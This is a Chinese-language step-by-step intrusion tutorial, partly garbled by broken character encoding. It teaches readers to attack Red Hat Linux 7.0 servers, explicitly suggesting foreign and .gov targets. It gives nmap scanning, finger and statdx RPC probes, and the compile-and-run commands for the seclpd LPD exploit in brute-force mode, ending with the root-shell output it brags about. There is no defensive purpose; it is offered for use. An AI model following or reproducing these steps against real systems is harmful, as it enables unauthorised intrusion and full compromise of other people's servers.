WINDOWS2000、NT是不是不想“玩”了，快跟我一步步入侵REDHAT LINUX7.0吧!

[一. 確定目標(biāo)]

日本?臺灣?美國?隨便你了!

[二.試試他的服務(wù)都有些什么]

比如TELNET 或是 FTP等等,你會得到一些系統(tǒng)信息的!

[三.找跳板]

當(dāng)然也是REDHAT LINUX7.0的了,最好是你自已的,方便嘛!

命令行:

C:\>telnet xxx.xxx.xxx.xxx

登陸上去了吧!

[四.用掃描器看看]

這里我們推薦使用NMAP,因?yàn)樵赨NIX系統(tǒng)中它夠爽,輸入以下命令:

bash-2.04$(這是系統(tǒng)提示狀態(tài)) nmap -sT -0 www.xxx.gov(你先前選定的目標(biāo))

是不是開了很多端口呀

[五.利用LP(網(wǎng)絡(luò)打印服務(wù))漏洞入侵]

重點(diǎn)來了!在REDHAT 7.0中有個LP漏洞(其實(shí)我們通過上面的掃描結(jié)果后也可以試試

RPC漏洞 例如:bash-2.04$ finger @www.xxx.gov 查看用戶

bash-2.04$ ./statdx -h 其中statd為rpc.ststd是一個程式需下載

查看系統(tǒng)支持版本

bash-2.04$ stat -d 0 www.xxx.gov 進(jìn)行溢出)

呵呵,跑題了!

我們需要下載一個SECLPD.C程序,然后將這個程序上傳到你的跳板上

用GCC編譯一下,輸入命令

bash-2.04$ gcc -o seclpd seclpd.c

編譯成功后,執(zhí)行看看命令的使用:

bash-2.04$ ./seclpd

看來就是它了,沒有錯.開始入侵

輸入命令

bash-2.04$ ./seclpd www.xxx.gov -t 0

結(jié)果顯示失敗,在來

bash-2.04$ ./seclpd www.xxx.gov -t 1

又失敗,我在來

bash-2.04$ ./seclpd www.xxx.gov brute -t 0 我加BRUTE,暴力,哈哈~

結(jié)果不在顯示TRY BRUTE FORCE了,是一直想要的RELAX AND ENJOY THE RIDE;>

現(xiàn)在要等它看出不出SHELL,大約五分鐘左右,就會有結(jié)果出來

- [+] shell located on www.xxx.gov

- [+] enter commands at will

linux xxx.www 2.2.16-22smp #1 smp tue aug 22 17:34:21 edt 2002 i686

unknown

uid=(0)(root) gid=7(lp)

我笑,我大聲地笑,我是ROOT了!

【編輯推薦】

1. RHEL 5系統(tǒng)下故障處理方法
2. 建立RHEL 5.0下版本控制服務(wù)器
3. RHEL5配置gdm讓遠(yuǎn)程機(jī)器登錄X window